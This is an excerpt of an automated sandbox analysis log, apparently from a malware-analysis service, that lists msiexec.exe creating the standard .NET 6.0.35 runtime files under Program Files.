                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ObjectModel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Xml.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\dbgshim.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l2-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.HttpListener.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Formats.Asn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Cng.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-timezone-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XDocument.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.Lightweight.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscorlib.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebClient.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Xml.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-string-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XPath.XDocument.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordbi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.InteropServices.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Immutable.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.NetworkInformation.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.UnmanagedMemoryStream.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.TraceSource.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-environment-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-console-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-heap-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.IsolatedStorage.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-util-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-runtime-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Mail.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Ping.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Claims.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Console.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\createdump.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.DataAnnotations.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.ZipFile.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Process.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Web.HttpUtility.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-synch-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-memory-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-libraryloader-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.Win32.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.DiagnosticSource.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebHeaderCollection.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Dynamic.Runtime.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Requests.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-conio-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.VisualBasic.Core.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\hostpolicy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Formatters.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Transactions.Local.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\.versionJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Drawing.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\clrjit.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.ReaderWriter.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Dataflow.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.Annotations.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\clretwrc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Parallel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Memory.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-math-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.DiaSymReader.Native.amd64.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.NonGeneric.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Tools.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.TypeExtensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-time-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.DataContractSerialization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Handles.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.Reader.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-console-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.Native.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ValueTuple.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Xml.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.NETCore.App.runtimeconfig.jsonJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Metadata.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-datetime-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.CSharp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.ResourceManager.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XmlSerializer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.NETCore.App.deps.jsonJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Csp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-private-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.OpenSsl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordaccore_amd64_amd64_6.0.3524.45918.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.AccessControl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Quic.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-namedpipe-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordaccore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.StackTrace.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Principal.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Principal.Windows.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\ucrtbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Encoding.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.Queryable.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Windows.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Overlapped.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.CodePages.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-filesystem-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscorrc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.DispatchProxy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.EventBasedAsync.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processthreads-l1-1-1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.Common.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.CompilerServices.VisualC.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.NameResolution.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.ThreadPool.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Thread.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-multibyte-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.Win32.Registry.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Contracts.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Numerics.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.InteropServices.RuntimeInformation.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Specialized.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-convert-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processthreads-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.SecureString.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.AppContext.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-handle-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-utility-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-process-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.Writer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-string-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-fibers-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Buffers.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Security.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.Brotli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XPath.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.ServicePoint.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.VisualBasic.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.DataSetExtensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.X509Certificates.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Tracing.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Concurrent.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Drawing.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Http.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.FileVersionInfo.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Debug.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Timer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\coreclr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Loader.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-heap-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.RegularExpressions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.Calendars.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.Parallel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.CompilerServices.Unsafe.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.TextWriterTraceListener.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-profile-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.FileSystem.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Primitives.dllJump to behavior
